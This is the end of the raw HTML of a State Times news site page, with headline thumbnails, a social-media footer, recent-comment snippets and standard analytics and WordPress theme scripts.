			<a href="http://news.statetimes.in/aamir-to-shoot-thugs-of-hindostan-climax-in-rajasthan/"><img src="http://news.statetimes.in/wp-content/uploads/2017/08/There-are-talented-stars-other-than-the-Khans-Aamir-265x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2017/08/There-are-talented-stars-other-than-the-Khans-Aamir-265x168.jpg" alt="Aamir to shoot 'Thugs of Hindostan' climax in Rajasthan" width="265" height="168">			  <p class="slide-caption">Aamir to shoot &#8216;Thugs of Hindostan&#8217; climax in Rajasthan</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/parineeti-chopras-million-rupee-prize-money-magic-on-hypstar/"><img src="http://news.statetimes.in/wp-content/uploads/2015/12/I-am-not-endorsing-being-thin-Parineeti-Chopra-232x168.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2015/12/I-am-not-endorsing-being-thin-Parineeti-Chopra-232x168.jpg" alt="Parineeti Chopra's Million-rupee Prize Money Magic on Hypstar" width="265" height="168">			  <p class="slide-caption">Parineeti Chopra&#8217;s Million-rupee Prize Money Magic on Hypstar</p>
			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1186</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
                                    <a href="https://plus.google.com/+StateTimes1"  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>146</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/#comment-6424" title="Shan Dar on India to land on Moon in April: Jitendra"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/#comment-6424" title="Shan Dar on India to land on Moon in April: Jitendra">Shan Dar</a> <time>on 23 Feb </time><span class="rc-post">in: <a href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/">India to land on Moon in April: Jitendra</a></span></h4>
                                    <p>India may land on Moon but Indian people are dying due to hunger on th ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/india-to-land-on-moon-in-april-jitendra/#comment-6424" title="Shan Dar on India to land on Moon in April: Jitendra">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/alarming-trends/#comment-6057" title="Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India on Alarming trends"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/alarming-trends/#comment-6057" title="Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India on Alarming trends">Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India</a> <time>on 13 Jan </time><span class="rc-post">in: <a href="http://news.statetimes.in/alarming-trends/">Alarming trends</a></span></h4>
                                    <p>Regarding the alleged use of the so-called armor-piercing 7.62x39mm bu ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/alarming-trends/#comment-6057" title="Dr. N. C. Asthana, IPS, Director General of Police (Modernization), Kerala, India on Alarming trends">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	        

        <div class="clear"></div>                    
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2017 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"33c05d68a3","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x39047'></script>
<script async="async" type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/akismet/_inc/form.js?x39047'></script>
    </body>
</html>
<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk 

Served from: news.statetimes.in @ 2018-02-25 18:00:37 by W3 Total Cache
-->